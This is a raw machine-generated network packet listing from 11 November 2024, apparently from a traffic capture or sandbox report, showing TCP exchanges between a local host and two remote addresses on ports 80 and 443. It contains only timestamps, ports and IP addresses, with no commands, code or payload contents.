                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643703938 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643724918 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643726110 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643735886 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643748045 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643752098 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643759966 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643768072 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643774986 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643788099 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643799067 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643805981 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643816948 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643817902 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643830061 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643838882 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643840075 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643858910 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643871069 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643871069 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643882990 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643887043 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643901110 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643912077 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643919945 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643923044 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643934965 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643939972 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643949032 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643959999 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643974066 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643978119 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643989086 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.643997908 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644005060 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644010067 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644013882 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644022942 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644035101 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644043922 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644047022 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644054890 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644068003 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644078970 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644082069 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644088984 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644089937 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644100904 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644119024 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644124031 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644145966 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644172907 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644243956 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644254923 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644267082 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644279003 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644284010 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644290924 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644304991 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644314051 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644323111 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644324064 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644335032 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644349098 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644349098 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644362926 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644367933 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644376040 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644387007 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644390106 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644402981 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644421101 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644431114 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644434929 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644448042 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644459009 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644467115 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644470930 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644484043 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644494057 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644494057 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644515038 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644517899 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644526958 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644539118 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644545078 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644553900 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644557953 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644567013 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644578934 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644589901 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644593000 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644613981 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644638062 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644642115 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644649982 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644661903 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644673109 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644680977 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644697905 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644720078 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644746065 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644757986 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644768953 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644778967 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644787073 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644790888 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644799948 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644804001 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644826889 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644846916 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644850016 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644862890 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644871950 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644882917 CET8049730185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644887924 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644905090 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:04.644931078 CET4973080192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.629327059 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.629384041 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.629439116 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630032063 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630072117 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630122900 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630279064 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630286932 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630328894 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630395889 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630420923 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.630465031 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.631495953 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.631510019 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.636565924 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.636579990 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.636756897 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.636771917 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.637207985 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.637217999 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.224771023 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.225012064 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.225024939 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226211071 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226336002 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226501942 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226725101 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226738930 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226766109 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226803064 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226921082 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.226928949 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227071047 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227088928 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227224112 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227303982 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227334023 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227813005 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227869034 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227935076 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.227982044 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228084087 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228125095 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228204966 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228240967 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228368998 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228430033 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228677034 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228745937 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228823900 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228832006 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228882074 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228889942 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228918076 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.228924990 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.275330067 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.279870987 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.279870987 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.279871941 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.279875040 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.279882908 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.326806068 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426510096 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426559925 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426594019 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426623106 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426631927 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.426673889 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.427028894 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.427078962 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.427124023 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.427130938 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.433022022 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.441339970 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.441414118 CET44349733142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.441468000 CET49733443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.459938049 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.459974051 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460019112 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460042953 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460055113 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460089922 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460100889 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460125923 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460170031 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.460176945 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.463596106 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.463654995 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.463664055 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.481909990 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.481918097 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.481971979 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.481987000 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.511955976 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.512089968 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.512732983 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.512756109 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.514022112 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.514092922 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.516752958 CET49736443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.516772985 CET44349736142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.519727945 CET49734443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.519747019 CET44349734142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538512945 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538552046 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538583994 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538609028 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538623095 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538634062 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538800001 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.538800001 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.540971041 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.546874046 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.546900988 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.546961069 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.546973944 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.550859928 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.552689075 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.558657885 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.558681965 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.558741093 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.558749914 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.558847904 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.564389944 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.569820881 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.569896936 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.569956064 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.569964886 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.570857048 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.575176954 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.596637011 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.598866940 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.598875999 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619466066 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619530916 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619565964 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619592905 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619602919 CET44349735142.250.186.100192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619632006 CET49735443192.168.2.4142.250.186.100
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:07.619859934 CET44349735142.250.186.100192.168.2.4
